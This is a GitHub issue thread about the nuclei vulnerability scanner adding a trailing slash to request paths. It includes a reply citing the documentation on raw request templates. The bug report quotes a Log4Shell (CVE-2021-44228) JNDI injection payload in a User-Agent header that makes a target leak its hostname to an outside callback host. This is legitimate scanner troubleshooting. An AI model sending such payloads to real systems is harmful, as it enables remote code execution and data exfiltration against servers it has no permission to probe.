The latest version will add "/" to the urlpath.

projectdiscovery / nuclei

Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the internet. It helps you find vulnerabilities in your applications, APIs, networks, DNS, and cloud configurations.

https://docs.projectdiscovery.io/tools/nuclei

MIT License

20.59k stars 2.51k forks source link

The latest version will add "/" to the urlpath. #4921

Closed j4vaovo closed 7 months ago

j4vaovo commented 7 months ago

For example, I want to check if a url has a header log4j2 nuclei automatically adds '/' to the urlpath, which causes the check to fail.


nuclei -id CVE-2021-44228 -u http://testphp.vulnweb.com/index.php

GET /index.php/ HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: ${jndi:ldap://${:-350}${:-321}.${hostName}.useragent.cnsug455p36ke354ca4gethghebzmetsw.oast.fun}

Expected behavior


GET /index.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: ${jndi:ldap://${:-350}${:-321}.${hostName}.useragent.cnsug455p36ke354ca4gethghebzmetsw.oast.fun}

derekkddj commented 7 months ago

acording to nuclei documentation, If you dont want to add a final slash the nuclei template should not have the / in "raw" requests. https://docs.projectdiscovery.io/templates/protocols/http/raw-http

To make a request to the URL specified as input without any additional tampering, a blank Request URI can be used as specified below which will make the request to user specified input.

    - raw:
      - |
        GET HTTP/1.1
        Host: {{Hostname}}